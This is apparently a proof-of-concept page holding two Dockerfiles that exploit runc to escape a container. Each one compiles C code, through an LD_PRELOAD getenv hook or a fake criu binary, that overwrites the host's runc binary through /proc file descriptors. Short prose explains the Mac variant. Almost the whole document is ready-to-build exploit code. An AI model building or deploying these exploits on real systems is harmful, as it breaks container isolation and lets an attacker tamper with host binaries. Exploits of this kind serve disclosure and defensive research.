The first version uses LD_PRELOAD to inject code to execve and overwrite the runc binary.
On mac runc is statically compiled and required a different trick. When doing a restore runc will try to execute criu to get it's version, we can use this point to hijack the flow and perform the same overwrite.
Refs:
| FROM ubuntu | |
| RUN apt-get update -y && apt-get install -y gcc | |
| RUN ( \ | |
| echo '#define _GNU_SOURCE'; \ | |
| echo '#include <fcntl.h>'; \ | |
| echo '#include <stdio.h>'; \ | |
| echo '#include <unistd.h>'; \ | |
| \ | |
| echo 'char *getenv(const char *__name) {'; \ | |
| echo 'int fd = open("/proc/self/exe", O_PATH);'; \ | |
| echo 'char path[20] = {0};'; \ | |
| \ | |
| echo 'snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);'; \ | |
| echo 'char cmd[100] = {0};'; \ | |
| \ | |
| echo 'snprintf(cmd, sizeof(cmd), "sleep 1; echo backdoored >> %s", path);'; \ | |
| echo 'char *argv[] = {"/bin/sh", "-c", cmd, NULL};'; \ | |
| echo 'execve("/bin/sh", argv, NULL);'; \ | |
| \ | |
| echo '}'; \ | |
| ) > pwn.c | |
| RUN gcc -shared -fPIC pwn.c -o /pwn.so | |
| ENV LD_PRELOAD /pwn.so | |
| ENTRYPOINT ["/proc/self/exe"] |
| FROM ubuntu | |
| RUN apt-get update -y && apt-get install -y gcc | |
| RUN ["/proc/self/exe", "spec"] | |
| RUN mkdir rootfs | |
| RUN ( \ | |
| echo '#define _GNU_SOURCE'; \ | |
| echo '#include <fcntl.h>'; \ | |
| echo '#include <stdio.h>'; \ | |
| echo '#include <unistd.h>'; \ | |
| \ | |
| echo 'void main() {'; \ | |
| echo ' int fd = open("/proc/1/exe", O_PATH);'; \ | |
| echo ' char path[20] = {0};'; \ | |
| \ | |
| echo ' snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);'; \ | |
| echo ' char cmd[100] = {0};'; \ | |
| \ | |
| echo ' snprintf(cmd, sizeof(cmd), "sleep 1; echo backdoored >> %s", path);'; \ | |
| echo ' char *argv[] = {"/bin/sh", "-c", cmd, NULL};'; \ | |
| echo ' execve("/bin/sh", argv, NULL);'; \ | |
| \ | |
| echo '}'; \ | |
| ) > pwn.c | |
| RUN gcc pwn.c -o /bin/criu | |
| ENTRYPOINT ["/proc/self/exe", "restore", "vakzz"] |